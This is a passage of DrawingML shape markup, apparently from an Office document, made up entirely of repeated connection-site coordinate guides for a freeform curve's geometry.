              <a:gd name="connsiteY21" fmla="*/ 750441 h 2300011"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 672853 h 2300011"/>
              <a:gd name="connsiteX23" fmla="*/ 8545846 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 561411 h 2300011"/>
              <a:gd name="connsiteX24" fmla="*/ 8930218 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 425213 h 2300011"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 442102 h 2300011"/>
              <a:gd name="connsiteX26" fmla="*/ 9276097 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 0 h 2300011"/>
              <a:gd name="connsiteX0" fmla="*/ 9276097 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2300011"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2300011 h 2300011"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2300011 h 2300011"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2275937 h 2300011"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2262840 h 2300011"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2187779 h 2300011"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2147900 h 2300011"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2138038 h 2300011"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 2091540 h 2300011"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 2040752 h 2300011"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1890709 h 2300011"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1768882 h 2300011"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1706329 h 2300011"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1659233 h 2300011"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1600253 h 2300011"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1518134 h 2300011"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1453879 h 2300011"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1397949 h 2300011"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1333930 h 2300011"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1185886 h 2300011"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1185886 h 2300011"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 750441 h 2300011"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 672853 h 2300011"/>
              <a:gd name="connsiteX23" fmla="*/ 8545846 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 561411 h 2300011"/>
              <a:gd name="connsiteX24" fmla="*/ 8930218 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 425213 h 2300011"/>
              <a:gd name="connsiteX25" fmla="*/ 9090939 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 184352 h 2300011"/>
              <a:gd name="connsiteX26" fmla="*/ 9276097 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 0 h 2300011"/>
              <a:gd name="connsiteX0" fmla="*/ 9276097 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2300011"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2300011 h 2300011"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2300011 h 2300011"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2275937 h 2300011"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2262840 h 2300011"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2187779 h 2300011"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2147900 h 2300011"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2138038 h 2300011"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 2091540 h 2300011"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 2040752 h 2300011"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1890709 h 2300011"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1768882 h 2300011"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1706329 h 2300011"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1659233 h 2300011"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1600253 h 2300011"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1518134 h 2300011"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1453879 h 2300011"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1397949 h 2300011"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1333930 h 2300011"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1185886 h 2300011"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1185886 h 2300011"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 750441 h 2300011"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 672853 h 2300011"/>
              <a:gd name="connsiteX23" fmla="*/ 8545846 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 561411 h 2300011"/>
              <a:gd name="connsiteX24" fmla="*/ 8905671 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 270590 h 2300011"/>
              <a:gd name="connsiteX25" fmla="*/ 9090939 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 184352 h 2300011"/>
              <a:gd name="connsiteX26" fmla="*/ 9276097 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 0 h 2300011"/>
              <a:gd name="connsiteX0" fmla="*/ 9276097 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2300011"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2300011 h 2300011"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2300011 h 2300011"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2275937 h 2300011"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2262840 h 2300011"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2187779 h 2300011"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2147900 h 2300011"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2138038 h 2300011"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 2091540 h 2300011"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 2040752 h 2300011"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1890709 h 2300011"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1768882 h 2300011"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1706329 h 2300011"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1659233 h 2300011"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1600253 h 2300011"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1518134 h 2300011"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1453879 h 2300011"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1397949 h 2300011"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1333930 h 2300011"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1185886 h 2300011"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1185886 h 2300011"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 750441 h 2300011"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 672853 h 2300011"/>
              <a:gd name="connsiteX23" fmla="*/ 8545846 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 307388 h 2300011"/>
              <a:gd name="connsiteX24" fmla="*/ 8905671 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 270590 h 2300011"/>
              <a:gd name="connsiteX25" fmla="*/ 9090939 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 184352 h 2300011"/>
              <a:gd name="connsiteX26" fmla="*/ 9276097 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 0 h 2300011"/>
              <a:gd name="connsiteX0" fmla="*/ 9280823 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2227722"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2227722 h 2227722"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2227722 h 2227722"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2203648 h 2227722"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2190551 h 2227722"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2115490 h 2227722"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2075611 h 2227722"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2065749 h 2227722"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 2019251 h 2227722"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1968463 h 2227722"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1818420 h 2227722"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1696593 h 2227722"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1634040 h 2227722"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1586944 h 2227722"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1527964 h 2227722"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1445845 h 2227722"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1381590 h 2227722"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1325660 h 2227722"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1261641 h 2227722"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1113597 h 2227722"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1113597 h 2227722"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 678152 h 2227722"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 600564 h 2227722"/>
              <a:gd name="connsiteX23" fmla="*/ 8545846 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 235099 h 2227722"/>
              <a:gd name="connsiteX24" fmla="*/ 8905671 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 198301 h 2227722"/>
              <a:gd name="connsiteX25" fmla="*/ 9090939 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 112063 h 2227722"/>
              <a:gd name="connsiteX26" fmla="*/ 9280823 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 0 h 2227722"/>
              <a:gd name="connsiteX0" fmla="*/ 9280823 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 9459 h 2237181"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2237181 h 2237181"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2237181 h 2237181"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2213107 h 2237181"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2200010 h 2237181"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2124949 h 2237181"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2085070 h 2237181"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2075208 h 2237181"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 2028710 h 2237181"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1977922 h 2237181"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1827879 h 2237181"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1706052 h 2237181"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1643499 h 2237181"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1596403 h 2237181"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1537423 h 2237181"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1455304 h 2237181"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1391049 h 2237181"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1335119 h 2237181"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1271100 h 2237181"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1123056 h 2237181"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1123056 h 2237181"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 687611 h 2237181"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 610023 h 2237181"/>
              <a:gd name="connsiteX23" fmla="*/ 8545846 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 244558 h 2237181"/>
              <a:gd name="connsiteX24" fmla="*/ 8905671 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 207760 h 2237181"/>
              <a:gd name="connsiteX25" fmla="*/ 9090939 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 121522 h 2237181"/>
              <a:gd name="connsiteX26" fmla="*/ 9280823 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 9459 h 2237181"/>
              <a:gd name="connsiteX0" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 11350 h 2213558"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2213558 h 2213558"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2213558 h 2213558"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2189484 h 2213558"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2176387 h 2213558"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2101326 h 2213558"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2061447 h 2213558"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2051585 h 2213558"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 2005087 h 2213558"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1954299 h 2213558"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1804256 h 2213558"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1682429 h 2213558"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1619876 h 2213558"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1572780 h 2213558"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1513800 h 2213558"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1431681 h 2213558"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1367426 h 2213558"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1311496 h 2213558"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1247477 h 2213558"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1099433 h 2213558"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1099433 h 2213558"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 663988 h 2213558"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 586400 h 2213558"/>
              <a:gd name="connsiteX23" fmla="*/ 8545846 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 220935 h 2213558"/>
              <a:gd name="connsiteX24" fmla="*/ 8905671 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 184137 h 2213558"/>
              <a:gd name="connsiteX25" fmla="*/ 9090939 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 97899 h 2213558"/>
              <a:gd name="connsiteX26" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 11350 h 2213558"/>
              <a:gd name="connsiteX0" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1011 h 2203219"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2203219 h 2203219"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2203219 h 2203219"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2179145 h 2203219"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2166048 h 2203219"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2090987 h 2203219"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2051108 h 2203219"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2041246 h 2203219"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1994748 h 2203219"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1943960 h 2203219"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1793917 h 2203219"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1672090 h 2203219"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1609537 h 2203219"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1562441 h 2203219"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1503461 h 2203219"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1421342 h 2203219"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1357087 h 2203219"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1301157 h 2203219"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1237138 h 2203219"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1089094 h 2203219"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1089094 h 2203219"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 653649 h 2203219"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 576061 h 2203219"/>
              <a:gd name="connsiteX23" fmla="*/ 8545846 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 210596 h 2203219"/>
              <a:gd name="connsiteX24" fmla="*/ 8905671 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 173798 h 2203219"/>
              <a:gd name="connsiteX25" fmla="*/ 9090939 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 87560 h 2203219"/>
              <a:gd name="connsiteX26" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1011 h 2203219"/>
              <a:gd name="connsiteX0" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1011 h 2203219"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2203219 h 2203219"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2203219 h 2203219"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2179145 h 2203219"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2166048 h 2203219"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2090987 h 2203219"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2051108 h 2203219"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2041246 h 2203219"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1994748 h 2203219"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1943960 h 2203219"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1793917 h 2203219"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1672090 h 2203219"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1609537 h 2203219"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1562441 h 2203219"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1503461 h 2203219"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
